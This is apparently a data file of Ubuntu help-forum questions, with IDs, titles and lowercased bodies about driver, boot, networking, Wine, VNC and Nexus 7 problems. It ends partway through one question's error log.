218019	startx fails , insufficient memory ?	some days back , i added a network printer at my institute . while trying to print for the first time , the computer asked for authentication , then complained of low disk space . i deleted a 3 gb movie from the desktop and restarted the computer . now gnome does not start . i first got a screen which said something like `` starting cups server.. '' at the end . i went back and deleted all the files that had been created recently in /etc/cups/ . now the screen says that it is starting gdm , then stopping gdm and the last message is something like `` stopping jupiter dameon.. '' . i could drop to the command line and login ... .a `` df -h '' showed that the usage in `` / '' is 100 % . i deleted some 3 gb of files from /home . now `` df -h '' shows 3 gb difference between total space and available space but the usage is still listed as 100 % i tried `` startx '' ... .i get a blank screen ... dropping to command line , i see the following messages ... fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found waiting for x server to begin accepting connections ... no protocol specified ... no protocol specified ... if i login as root , am able to start x , but the screen just shows a completely empty desktop ... ..am unable to do anything ... .
218022	how to exit automatically from current copying process ?	i am trying to copy the content from my source folder to mounted destination folder . what i did is i was mounted 4 devices by giving the ip to /etc/fstab . //192.168.100.1/c1 /media/client_1 smbfs guest 0 0 //192.168.100.2/c2 /media/client_2 smbfs guest 0 0 //192.168.100.2/c3 /media/client_3 smbfs guest 0 0 //192.168.100.2/c4 /media/client_4 smbfs guest 0 0 and then by using python script , i am trying to copy the files to all client_1 , client_2,3 and 4 folders.the below line is used to copy the file to mounted folders . os.system ( `` cp -f sourcepath/* /media/c1 '' % locals ( ) ) os.system ( `` cp -f sourcepath/* /media/c2 '' % locals ( ) ) like c3 and c4 folders the file is moving properly . but , the problem is if any network issues are happened while copying the content the script will not move to next line , the process is waiting until the network come back again . out of 4 mounted device if suppose c2 has a problem , the script terminate the c2 and try to move the content to c3 and c4 . i am struggling this place . if you know let me . note : i can understand -f means force , if an existing destination file can not be opened , remove it and try again . what argument i need to use for copy the content to mounted folder , if any network issues happen , it need to terminate that copying folder .
218023	my ati graphics card gets very hot and ubuntu freezes	i`m using 12.10 on my desktop . it constantly freezes . the graphics card is really very hot . i ca n't even touch it . : (
218024	how to install software from old repository ?	i want to install a package on a computer running ubuntu precise . however , the provider of the package only `` supports '' ubuntu up till lucid . newer versions are probably supported as well , but they stopped updating the repository . the newest repository available is deb http : //appscale.cs.ucsb.edu/appscale_packages lucid stable if i try to install the package from that repository i get this error , probably because of version issues : $ sudo apt-get install appscale-core reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : appscale-core : depends : sun-java6-jdk but it is not installable depends : libboost-filesystem1.40.0 but it is not installable depends : libboost-serialization1.40.0 but it is not installable depends : libboost-thread1.40.0 but it is not installable depends : libboost-program-options1.40.0 but it is not installable depends : libboost-iostreams1.40.0 but it is not installable depends : libboost-python1.40.0 but it is not installable e : unable to correct problems , you have held broken packages . my system is fully updated and upgraded , so i doubt that i indeed have broken packages . i 've been in this situation before , that i had a repository that only existed up to some version lower than the current ( lts ) version . is there a general way for resolving this ?
218027	ca n't run cstrike.exe file in counter strike1.6 using wine	when i right click on cstrike file and select open with wine windows program loader it doesnt show any error nor the game gets started .
218029	authentication failure when using any vnc viewer ( windows ) with vnc server on ubuntu 12.04	i 'm new to vnc on linux and have been following these general instructions to try connect to my ubuntu 12.04 vps and view the linux gui , but have been getting authentication failure messages when trying to login : i log in to my linux vps and start vnc server on my linux vps : vncserver i then set and verify my password `` to access my desktops '' , which i do . the vncserver is then started under some new 'x ' desktop name , e.g . vps:1 i use nmap to view which port this new x desktop is running on e.g . nmap localhost i run vnc viewer ( tightvnc viewer , realvnc viewer ) on my windows 7 pc and connect to the ubuntu vps with the given port enter my password from step 2. after successfully connecting to the vps get `` authentication failed '' messages over and over again . going crazy now . does anyone know what i am doing wrong ? i have allowed the vnc viewers to pass through the firewall , but have run out of ideas now and the above error is still happening . thanks in advance .
218033	ca n't get wine to install ubuntu 12.10	i have just successfully installed ubuntu 12.10 on my computer and i got it to duel boot with windows 7 . my problem is that i want to use windows games ( like halo combat involved ) inside ubuntu . so i went to the ubuntu software center and tried to install wine so i could do that . but it does n't install and gives me this message the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.7ubuntu6 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1 ) but 1.4.1-0ubuntu1 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not going to be installed
218038	how to send magic package to windows xp	hi is there a program which can send magic package to wake on lan windows xp computer ? or can it be done thru command line .
218043	32gb nexus 7 conversion to ubuntu	tried to install ubuntu as per your instructions https : //wiki.ubuntu.com/nexus7/installation . it appeared to install and re-booted its self . however all that appeared was some very small text and there it stayed . eventually i re-installed the stock android , as per your instructions , which worked fine . i chose the 32gb option during the install . any ideas as to what i can do ?
218044	can i use the steam client as a launcher for all my games ?	on windows the steam client allows me to link non steam games so that i can use the client as a launcher for all my games in my system . can that be done also in the linux client for my wine / playonlinux games ? how ?
218049	how to reset setting of wine , avoiding uninstalling all applications in it ?	foobar2000 volume slider stopped working in wine sound is good but volume can not be changed from the player 's slider anymore . is there a setting in wine that might have entailed this ? i have tested [ vineyard ] [ 1 ] ( also ) and then gave it up on which occasion some setting in wine might have been altered but can not see which . edit : this affects the main installation ( v.1.1.15 ) made in wine , and also portable installations of the same version ( as well as portable installations of v.1.1.14 and 1.1.17b that i tested ) but does not affect older versions like 1.0.3 . after testing more versions , it seems that the newest version without this problem is 1.1 . ( that is , before the version that changed the classic white-on-black foobar2000 icon with the new white one . )
218050	flash drive not working	i have an 8gb usb flash drive and ubuntu 12.04 but ubuntu does not recognise the drive on the desktop and it will not let me transfer files to it , however it does read files that are there ( from windows etc ) it all works on ubuntu 904 though hi i have solved the problem from another post thanks
218055	usb 3.0 port with usb 3.0 device in ubuntu 12.10	when i try to connect a usb 3.0 device in ubuntu 12.10 ( asus k55vd , kernel 3.5.0-19-generic # 30-ubuntu smp ) , the system says [ 74.747832 ] hub 3-0:1.0 : unable to enumerate usb device on port 1 [ 74.931957 ] usb 4-1 : new superspeed usb device number 2 using xhci_hcd [ 74.949390 ] usb 4-1 : new usb device found , idvendor=05e3 , idproduct=0731 [ 74.949396 ] usb 4-1 : new usb device strings : mfr=0 , product=1 , serialnumber=2 [ 74.949400 ] usb 4-1 : product : usb storage [ 74.949403 ] usb 4-1 : serialnumber : 0000000000000033 [ 75.033327 ] usbcore : registered new interface driver uas [ 75.038548 ] initializing usb mass storage driver ... [ 75.038651 ] scsi7 : usb-storage 4-1:1.0 [ 75.038700 ] usbcore : registered new interface driver usb-storage [ 75.038701 ] usb mass storage support registered . but it does not recognize the device , and the disks applications ( gparted , nautilus ) act as if nothing had been connected . i have checked other questions , but either they have no answers or they told about previous ubuntu version with 3.0.x kernels . a usb 2.0 device will work in the usb 3.0 ports . a usb 3.0 device will work ( at usb 2.0 speeds ) in the usb 2.0 ports . the problem , as i wrote , is between usb 3.0 devices and usb 3.0 ports . i have my usb 3.0 ports configured without legacy support via the bios ( the way they should be , i suppose ) . but i also have tried to configure them with xhci preboot mode disabled . have any one solved a similar problem ? thanks in advance .
218060	unity webapps problem ( 12.04 )	hello all : ) new ubuntu user here . i yesterday installed the unity webapps preview on my laptop . actually it did not work , because of some dependency issues with a xul-firefox extension or something . could look into it , if that info is needed . so i deinstalled the webapps thing , via software center , where removed unity-webapps-service which also removed libunity-webapps0 . after the restart my unity interface was gone . i could still open the terminal and do things that way . i tried to start unity but it said it was broken and had to be repaired . i tried sudo apt-get -f install unity but that just reinstalled the webapp packages again . so now i have the webapps preview installed , but that is ( despite working at all ) also causing problems with gwibber ( can not search ) . so i would like to uninstall is , without screwing up unity . thanks for any help and sorry if i did not get the formatting right , will try better next time .
218063	boot path not found , can not start os	my desktop is 12.04 64bit , and it can not boot from the hard drive anymore . when i attempt to it just is stuck on a blank screen with an blinking dash , and nothing happens . i checked with the bios trouble shoot for problems and it said that no boot path could be found . i do not know why this is happening , but need to fix it because it used to boot up normally . what i need to know is how to fix it . i can boot into a live dvd . also , there were a few boots i would attempt to boot into a live usb , then it would boot to the hard drive , but that does not work any more . so with the live dvd ( it is an 10.04 lts 32bit ) , is there any means to correct the boot path from the live dvd ? thank you for your time and answers .
218064	which software is useful instead of photoshop in ubuntu	i like to know which software is same as adobe photoshop of windows . from where i get the tutorials of that software . can i install adobe photoshop in ubuntu .
218068	alcatel one touch upgrade	original question : добрый день ! хотелось бы узнать , можно ли обновить телефон alcatel ot-710 на ubuntu через официальную программу обновления ? translated to english : good day ! i would like to see if you can update your phone alcatel ot-710 through the official ubuntu software updates ?
218070	no /sys/kernel/debug/vga_switcheroo with t430s	i have a thinkpad t430s . the device includes an nvidia nvs 5200m gpu ( with optimus , i.e. , hybrid graphics ) . now since kernel 3.5 the vga_switcheroo way to switch between integrated and discrete graphics should be available per default . however , i do not have the /sys/kernel/debug/vga_switcheroo file on my system , even though i use the standard kernel and i am not using nomodeset . the respective bios setting is also set to optimus and i also am able to find the nvidia device with lspci ; the nouveau module is loaded as well . what could be the reason for the absence of the switch ? i am very thankful for any input . kind regards , yoder
218071	newest kubuntu active build on dell inspiron duo - touchscreen issues	i 'm running the live cd of kubuntu active ( http : //cdimage.ubuntu.com/kubuntu-active/releases/12.10/release/ ) off of usb on my dell inspiron duo . the touchscreen works to the point that the mouse cursor will move to where you 've tapped the screen , but will not register any kind of click , so i ca n't interact with any ui elements on the screen . i can move the mouse pointer around like nobody 's business , though . : ) any ideas on how to get the touchscreen to `` click '' also ?
218075	how well does an nvidia 9800 work with unity ?	hi i looked at upgrading to 12.10 today , and got the warning that my graphics hardware may not be fully supported . i 'm using an hp pavilion dv5000 laptop with a nvidia 9800 graphics card . has anyone upgraded despite the warning and had un-fixable problems , or does anyone have any tips for getting round this problem , perhaps using unity 2d , or some idea about the timescale this is likely to be fixed on .
218084	is my computer compatible with ubuntu 12.10 64-bits ?	i am currently under ubuntu 12.04 lts 32-bit because when i upgraded to ubuntu 12.10 it was horrifically slow and crashed after 10 minutes of use by freezing . i would like to know , from a ubuntu command or menu , if my computer is compatible with ubuntu 12.10 64-bit . also , do you think that upgrading will resolve my problem or does it come from something else ? thanks , mjchopperboy
218085	installing skype on 12.10 64 bit causes errors	i have installed ubuntu 12.10 64bit ( clean install ) and updated it . after that i tried to install skype , and i get error that skype depends skype-bin , but it could not install it , and that there are some broken packages ! ? in ubuntu software center there is no skype . and when i try to download it from skype website it installs it via software center and it displays the error that it is not supported because it 's i386 ... so , how this is possible on clean install of ubuntu 64bit ? and how to fix it ? and will someone fix it in next update ? thanks in advance , predrag
218086	connect php to microsoft access odbc	one of our employees created a microsoft access database and have built a joomla ! module around it . it is currently running on a wamp server , with an odbc connection to the adb file . how can i create an odbc connection on ubuntu for the access database ? at this point , i 'm open to having the db live locally on my ubuntu server , or on an smb share somewhere . moving it from access to mysql has already been proposed . it may come down to that , but i 'm really being pressured to find another option . does anyone know if this is possible and how to accomplish it ?
218100	moving screenshots from 1 folder to another instantly	i am hosting a gaming site and once in a while the server automatically creates a screenshot in the servers folder . unfortunatly it is not configurable in the server settings where it puts these screenshots , it just allways dumps the png file in the server config folder . my folder structure is for example as follows : /home/game/server1/ now , what i would like to achieve is that once the server creates a screenshot in 1 of these server folders ( i have multiple ) , the operating system moves the screenshot immediatly ( which is allways a *.png file ) to the webserver folder , for example : /var/www/server1/filename.png so that players can see the screenshot on the website . anyone any idea on how i can tackle this problem the smartest way ? please note that my ideal situation would be if the png file is moved immediatly after creation . thanks for your help . frank
218101	if the net is required to install an atheros 8161 driver , how do i connect to the net without the driver ?	if ubuntu does not recognize hardware to connect to the net , and a net connection is necessary in order to install drivers for hardware that connects to the net , then how is such a system ever going to connect to the net ? you can see the situation in this thread : how do i install drivers for the atheros ar8161 ethernet controller ? and in this thread : build-essential and linux-headers-generic gives abort message surely , surely , there is a way out of this catch-22 .
218102	ubuntu 12.10 being unable to mount windows drives	ubuntu 12.10 does n't show the one of my windows drives . when i try to mount the drive , ubuntu shows : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read $ mftmirr : input/output error failed to mount '/dev/sda6 ' : input/output error ntfs is inconsistent . one more problem is also there : when i try to install windows 7 with live dvd as well as usb , the installation freezes at the screen 'setup is starting ... ' . please help me in this issue because there are various important files in that drive ... ..
218107	installing nvidia geforce gt630m display driver on dell vostro 3460 core i5	my newly purchased dell vostro 3460 core i5 has nvidia geforce gt630m graphics card . but i do n't have the driver for it and failed to install it . please help .
218108	no lock screen when the right click menu is open	i just found that the lock screen on my laptop does not show up when the right click menu is open . i discovered this when i pressed the right click button accidentally while closing the lid and the laptop went to sleep , but the lock screen never showed up when i opened the lid again . i am also not able to lock the system manually ( with ctrl+alt+l ) when the right click menu is open . is this by design or is it a bug ? i would assume that the screen should be locked automatically when the computer goes to sleep , but this does n't seem to be the case . anyone have any suggestions ? my specs are : dell vostro 1500 , ubuntu 12.10
218114	how do i play music in the terminal in the background ?	i used the command setsid mplayer strayheart.mp3 in a terminal , but then i could n't stop it and i could n't work on something else with that terminal instance . what i want is to be able to play music in background in the same terminal and get to write some commands while it is playing . is it possible or not ? if yes , how do i do that ?
218118	need drivers for d-link dwa 525 pci wireless adapter	i 'm using ubuntu 12.10 32-bit edition . i have racently purchased d-link dwa 525 pci wireless adapter . but i ca n't find the drivers for the adapter . i have been searching in internet for a while . tried many options , including ndiswrapper . when i run lspci command , it detects and shows as below . 04:00.0 network controller : ralink corp. rt5360 wireless 802.11n 1t/1r my kernel version was 3.5.0-18-generic . after i have upgraded my kernel to 3.7.3-030703-generic and now the device detects as network controller [ 0280 ] : ralink corp. rt5360 wireless 802.11n 1t/1r [ 1814:5360 ] subsystem : d-link system inc dwa-525 wireless n 150 desktop adapter ( rev.a2 ) [ 1186:3c05 ] kernel modules : rt2800pci but still there is no sign of the wireless interface in network connections window or in iwconfig . and the interface is not functional yet . the output of iwconfig is lo no wireless extensions . eth0 no wireless extensions . the output of ifconfig is eth0 link encap : ethernet hwaddr 00:27:0e:05:5c : e1 inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :227 : eff : fe05:5ce1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:38317 errors:0 dropped:0 overruns:0 frame:0 tx packets:34741 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:38422211 ( 38.4 mb ) tx bytes:4955007 ( 4.9 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3499 errors:0 dropped:0 overruns:0 frame:0 tx packets:3499 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:342593 ( 342.5 kb ) tx bytes:342593 ( 342.5 kb )
218126	how to i install my video driver for nvidia geforce 610m on ubuntu 12.04	i 've just installed ubuntu on my laptop and noticed that my nvidia driver wasnt installed . so i installed nvidia-current with the terminal command sudo apt-get install nvidia-current but now my display only has the 640p resolution and i cant seem to undo anything . i even tried sudo apt-get remove nvidia-current . it uninstalls but nothing changes and the resolution remains unchangable in the display menu . i tried to reset unity with the terminal command sudo unity -reset , but when i do that my screen flickers and compiz crashes . for me to restore compiz is to restart my computer . can anyone give me and idea where to look elsewhere for problems because im getting pretty lost here and working in 640p isnt ideal thanks in advance , funonly
218129	`` text file busy '' when running a simple script on bash	when i make a simple script , i get `` text file busy '' when i try to run it . dbell @ det-ui-supergbe : ~ $ cat > test2 ls ^z [ 2 ] + stopped cat > test2 dbell @ det-ui-supergbe : ~ $ chmod a+x test2 dbell @ det-ui-supergbe : ~ $ ./test2 -bash : ./test2 : text file busy
218130	why ubuntu can not work in virtualbox ?	i 've installed virtualbox on my laptop which has windows 7 operating system , but i can not run ubuntu and it shows me the following error : this kernel requires a x86-64 cpu , but only detected an i686 cpu . unable to boot- use a kernel appropriate for your cpu .
218131	will my bluetooth keyboard work with ubuntu on nexus 7 ?	is bluetooth supported ? will i be able to use a mouse or keyboard via bluetooth ?
218134	synaptic proxy ca n't remove	hello couple of days ago i set a proxy for synaptic and then last night i disabled the proxy and tried to reload the list of packages . but the proxy was n't disabled and i could n't do it with apt-get either . i 've already checked apt.conf and apt.conf.d/01proxy and they 're empty . does anyone knows that where should i check ? thank you !
218135	the ambient light sensor/camera/accelerometer is n't working on the nexus 7 . are there plans to support it ?	there are several sensors and devices on the nexus 7 that are not currently working with ubuntu that work in android . are there plans to support these sensors/devices ?
218138	apple bluetooth keyboard ( and mouse ) issue on ubuntu 12.10	i just installed ubuntu 12.10 ( dual boot ) on an imac computer ( intel core i5 , 4gb ram , amd radeon hd 6750 running os x lion ) . the bluetooth apple keyboard ( and mouse as well ) are causing a huge headache . the keyboard is not detected when i first install ubuntu , but then i used the fix described in : http : //www.thetechrepo.com/main-articles/520-how-to-connect-an-apple-bluetooth-keyboard-toubuntu-troubleshooting this fixed the problem but only to a certain extent . here is what the issue is now : on the refit screen the keyboard does not work at all when rebooted from ubuntu ( it does work when rebooted from os x ) . when i get to the login screen in ubuntu , it does connect and i can enter the password perfectly : ) however once logged in the keyboard stops working properly , and the buttons get really messed up ( my keyboard does not have the numpad keys and when i press the `` i ' , `` o '' `` p '' keys and the ones below it shows them as the numpad keys ( e.g . it prints numbers to the screen ) . all of the other keys ( enter , alt , space and all letters ( except the one below the i , o , p , keys ) do n't work . i am not sure whether these are all due to the same issue , but it is very frustrating . my apple mouse also does not connect properly either and i have to use a wired mouse first to connect the wireless mouse before it works . is this a common issue is there a simple workaround ? would the previous release ubuntu 12.04 fix the problem ? thanks , sam
218139	can i use a usb keyboard and mouse with the nexus 7 ?	can i use my usb keyboard and mouse while running ubuntu on the nexus 7 ? the interface is not quite ready for touch input , and i 'd like to be able to help test .
218143	how can i connect my kubuntu 12.10 to a different pulse audio server ?	i have configured my pc as pulseaudio server . now i want to connect my laptop ( kubuntu 12.10 quantal ) with this pulse server . in earlier versions there was the `` padevchooser '' , which could be used to select a different audio sink in the network .
218144	how do i reset ubuntu on my nexus 7 if it locks up ?	i 'm running ubuntu on my nexus 7 and it appears that the device locked up . is there a procedure to trigger a shutdown or hard reset ? ?
218148	stop/start battery charging through software ?	if a laptop is powered on and connected to ac power , is there a way to issue a command that tells it not to charge the battery ? edited : perhaps charging of the battery may be stopped if there were a way to fool the system into thinking the battery is already at 100 % charge .
218152	ubuntu 12.10 & 12.04.1 lts mouse freezing ( saitek cyborg r.a.t.5 mouse )	i 've figured it out : it 's the cyborg mouse . i 'll be looking through the questions as i remember seeing something about this . i 'm getting a similar issue to this fellow : ubuntu 11.04 randomly freezes for over one minute sometimes it comes back to life after a minute or two only to crash again . alt-tab works , but it does not display the windows-switching animation . it just switches the focus ... sometimes . ctrl-alt-t works , thankfully , and the terminal stays responsive long enough for me to get in a `` sudo reboot now '' and type my password . i 'm running a fresh wubi install on a separate hdd from my windows install . 64-bit 12.10 12.04.1 lts now , with an amd fx chip , 8gb of ram , and a radeon hd 3850 . my mouse is a saitek cyborg r.a.t.5 mouse , and my keyboard is a stock acer one that came with a pc i bought a few years ago .
218157	no internet on ubuntu 11.10	i really really hope you can help me here , i just got a 12.04 server set up and running in london and with port changed and ssh [ rsa key ] log in . then i updated my home pc to 11.10 and cant get connected to the internet . i was going to usb upgrade again to 12.04 but the iso file when booting from pen wants to upgrade using the net for some packages . bummer . some details . jam @ jam-desktop : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00 : e0:4c:36:07:58 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:25 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:456 errors:0 dropped:0 overruns:0 frame:0 tx packets:456 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:35968 ( 35.9 kb ) tx bytes:35968 ( 35.9 kb ) jam @ jam-desktop : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:456 errors:0 dropped:0 overruns:0 frame:0 tx packets:456 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:35968 ( 35.9 kb ) tx bytes:35968 ( 35.9 kb ) i have searched the net widly on this problem for around 3 days now , and about to scream . lol more details.. network says plug unplugged .. [ its not ] in the /etc/network/interfaces auto lo iface lo inet loopback i had been able to force start the connection a few days ago by doing something like.. sudo /etc/init.d/network restart ... .. or something along them lines . i still not sure what caused it to start but was playing with this at the time when it started , problem was after doing a reboot it cant find the connection again . i really need all the help i can get on this , i fallen behind on business , were i should have started building my online shop i find i might have to rebuild this pc and the server . please help .
218158	how to cross-compile programs for the raspberry pi with gcc ?	i am fond of using gcc to compile small little c and c++ programs on my main computer . however , i also have a raspberry pi , and , being a 700-mhz single-core computer , i would prefer to not have to do my development work on it every time i want to create a binary for it . how ( for i know that there 's a way ) do i cross-compile my program for the raspberry pi using my x86 laptop ? and is there a way that i may compile c ( ++ ) programs on the pi but produce an x86 binary ? if it 's any help , `` the soc is a broadcom bcm2835 . this contains an arm1176jzfs , with floating point ... '' ( according to the official raspberry pi faq ) .
218159	i 'm running ubuntu on my nexus 7 , do i have access to the same packages as if i 'm running ubuntu on my desktop ?	i noticed that some packages are not available on my nexus 7 when browsing the software center or using `` apt-cache search '' . can anyone explain ?
218160	dell studio xps 1647 bios update	short question . does anybody managed to update bios on dell studio xps 1647 from ubuntu ? i have a01 and want to update to a11 . i read a lot of stuff on the web and around how to do this and failed . freedos approach finished with a problem of running exe file ( with bios update from dell website ) as a file that ca n't be run in a dos mode ( or sth similiar ) . any feedback appreciated . thanks .
218161	setting up no-ip on a ubuntu server 12.04 ?	i have used a wget to get the latest versions from the no-ip.com site . i then had to type in my account details which went fine . i try to type in the address in a url outside my home and that url gives me nothing .
218165	are there any plans to transition ubuntu on the nexus 7 away from the android kernel ?	will the android kernel and underpinnings eventually go away ? what are the plans for newer kernel releases ?
218166	skype causing update problems	i 'm a total noob . i updated skype from the latest version available on the skype website . now i get the following error every time i try to run software updater : w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . i need idiot-proof noob-friendly instructions on how to fix this .
218170	possible to run wine / crossover / playonlinux in parallel ?	is it possible to run wine , crossover and playonlinux in parallel ? i 'm testing all three in order to : see which applications run better on which platform which of these is easier to use for non-technical users an unrelated question : it looks like there is a `` meta-package '' for wine on ubuntu that includes multiple wine packages - is it similar for crossover / playonlinux ?
218171	how do i install a driver for a kodak esp 3250 printer ?	first my system : pentium 4 -do n't remember the speed- , 1g ram , dual boot to separate physical drives , fdos and lubuntu 12.1 second my lan : i have four computers operating for the same printer . intel quad core i5 , 4g ram , running windows 7 64 bit , printer connected and shared from here . kodak esp 3250 gateway 17 '' laptop running windows 7 32bit asus tablet ( small laptop ) running lumbutu 12.1 my dual boot system running fdos and lubuntu 12.1 the problem : i downloaded c2esp_25c-1_i386.deb , tried to install it using debi package installer , it loads the files , looks for cups driver and ends with an error : '' dependancy is not satisfiable : libcupsdriver1 ( > =1.4.0 ) '' what do i do now ? is there some place that i can get the correct cups driver ? further information : the asus tablet was running ubuntu 12.1 ( very slowly and with a few crashes ) and could print from the lan printer with no problems . is there something in ubuntu that can be loaded into lubuntu ?
218173	how do you print/recall the definition of a function in bash	i can define and print the contents of variable called my_var like this : my_var= '' hello '' echo $ my_var but if i define : my_funct { echo `` hello '' ; } how can i recall my function 's definition later on ?
218185	centrino ultimate n wireless card not working on a thinkpad x230t	i have a lenovo thinkpad x230t , and i previously had a lenovo thinkpad x60t . my current machine ( the 230t ) runs 12.04 , whereas my old x60t ran 10.04 . they both had this issue connecting to two wireless networks at my school , while no one else i know running linux has had this issue . basically , one of two things happens . first , i often can connect to the wireless network , according to the network manager , and am given an ip address , but then actually have no network connection ( ie , i ca n't ping anything ) despite the network manager reporting some nonzero network speed . another ( presumably related issue ) is that occasionally i will see a massive spike in network activity after which the network manager still thinks i 'm connected but i get no network connection ( a reported speed of 0 and inability to ping anything ) my laptop has an intel centrino ultimate n wireless card , and the drivers appear to be working . this problem is not seen by a lot of other people running ubuntu at my school . any help would be greatly appreciated .
218189	is python-augeas missing a dependency on libpython2.7 ?	when i install python-augeas on a `` minimal server '' ubuntu installation of 12.04 lts , it throws the following import error when i try to use it : # python python 2.7.3 ( default , aug 1 2012 , 05:14:39 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import augeas traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python2.7/dist-packages/augeas.py '' , line 55 , in < module > class augeas ( object ) : file `` /usr/lib/python2.7/dist-packages/augeas.py '' , line 61 , in augeas for _v in ( `` % d. % d '' , `` % d % d '' ) ] ) file `` /usr/lib/python2.7/dist-packages/augeas.py '' , line 52 , in _dlopen raise importerror ( `` unable to import lib % s ! '' % args [ 0 ] ) importerror : unable to import libpython2.7 ! if i manually install libpython2.7 , the problem goes away . looking at the package info for python-augeas , there is no dependency listed for libpython2.7 . am i missing something or should this be in place ? should i file a bug report ?
218192	allow user to upgrade installed packages	my users do n't have administrative privileges . i do n't allow them to install packages from ubuntu repositories but they must be able to install all updates availables from ubuntu repositories and my custom one . i created the file /var/lib/polkit-1/localauthority/50-local.d/automaticupdates.pkla : [ update manager ] identity=unix-user : * action=org.debian.apt.upgrade-packages resultactive=yes this work when no new packages are proposed by software update , but if an updated packages try to push a new package , it fails ( =ask for admin password ) because it need org.debian.apt.install-or-remove-packages permission . if i uncheck theses new packages and start the update process , the update starts ... and install theses packages anyway even without the permission . there is a way to make update manager to install all updates without asking for admin password ? this is an example of update not working without admin password : the following new packages will be installed : linux-headers-3.2.0-33 { a } linux-headers-3.2.0-33-generic { a } linux-image-3.2.0-33-generic { a } the following packages will be upgraded : apport apport-gtk gir1.2-gtk-3.0 gnome-settings-daemon libgail-3-0 libgtk-3-0 libgtk-3-bin libgtk-3-common linux-generic linux-headers-generic linux-image-generic linux-libc-dev python-apport python-problem-report 14 packages upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/55.4 mb of archives . after unpacking 217 mb will be used .
218194	dell vostro 2520 has flickering green line to top of screen after running system update	i have 4 vostros2520 that came with ubuntu 11.10 64bit and they were all fine until i ran the system update . after the system update was completed a green flickering line appeared to the top of the screen of all the laptops . this appear to be a driver issue with the updates . i tried changing the os on one of the laptops to ubuntu 12.10 and ran the updates . the monitor worked fine but now the boardcom device 4365 wireless card is not showing . therefore i have solved 1 problem and fall into another . i do n't know if to revert back to ubuntu version 11.10 and just never run updates . or try and get the wireless card to work under version 12.10 ?
218195	does installing ubuntu on my nexus 7 void the warranty ?	are there any steps to return my device to factory defaults with stock android ? will the warranty still be valid if so ?
218197	upstart 1.6 doubts about performance	with upstart 1.6 , i have a couple of questions : what does it mean it is able to `` boot without initramfs '' . does it mean it will boot faster without loading an image to ram ( or doing it with an alternative way ) . how will processes running in init be managed differently compared to previous versions of upstart ?
218206	is suspend ( s3 ) supported on the nexus 7 ?	i was curious to know if suspend was supported on the nexus 7 , the tablet will suspend from the system indicator but there seems to be a problem when attempting to suspend via the power menu .
218210	do i need to reinstall nvidia ( and any other ) drivers if i install pae kernel	i was going to add ram to my notebook to a total of more than 4gb , and i have ubuntu 12.04 32bit ; so i installed the pae version of the linux kernel and booted with it to give it a try before i buy the ram . my nvidia drivers , which work fine with the normal kernel ( as fine as nvidia drivers can work ) , do n't work when i boot with the pae kernel . my second monitor stops working , and when i try to launch nvidia settings , it tells me that i 'm not using an nvidia x driver . now i 've rebooted with the old normal kernel and everything works as before . so , is there some sone bug or incompatibility between the pae kernel and the nvidia drivers , or will i just need to reinstall ( perhaps a different version of ? ) the nvidia driver if i want to start using the pae kernel ? ( which in turn means , will i just waste money if i buy the additional ram ? )
218213	how can i view and change the kernel bootargs my nexus 7 is using at startup ?	in the event that a user wants to make modifications to the kernel commandline how would i do so ? can i `` cat /proc/cmdline '' to view the bootargs ? ?
218214	can not open software centre	i recently added a ppa ( i think it was to change login screen from lightdm to mdm ) and ever since then my software centre has stopped working . whenever i open it i get a `` software centre has closed . relaunch ? '' message . when i try opening it from terminal using software-center it always comes up with this message : ( software-center:19724 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1947:11 : not using units is deprecated . assuming 'px ' . ( software-center:19724 ) : gtk-warning ** : failed to parse /usr/share/themes/mac-os-lion-theme/gtk-3.0/settings.ini : key file contains line '/* ' which is not a key-value pair , group , or comment 2012-11-16 20:18:20,896 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-11-16 20:18:20,904 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-11-16 20:18:21,910 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-11-16 20:18:22,689 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2012-11-16 20:18:25,697 - softwarecenter.ui.gtk3.app - info - software-center-agent finished with status 0 2012-11-16 20:18:25,698 - softwarecenter.db.database - info - reopen ( ) database 2012-11-16 20:18:25,698 - softwarecenter.db.database - info 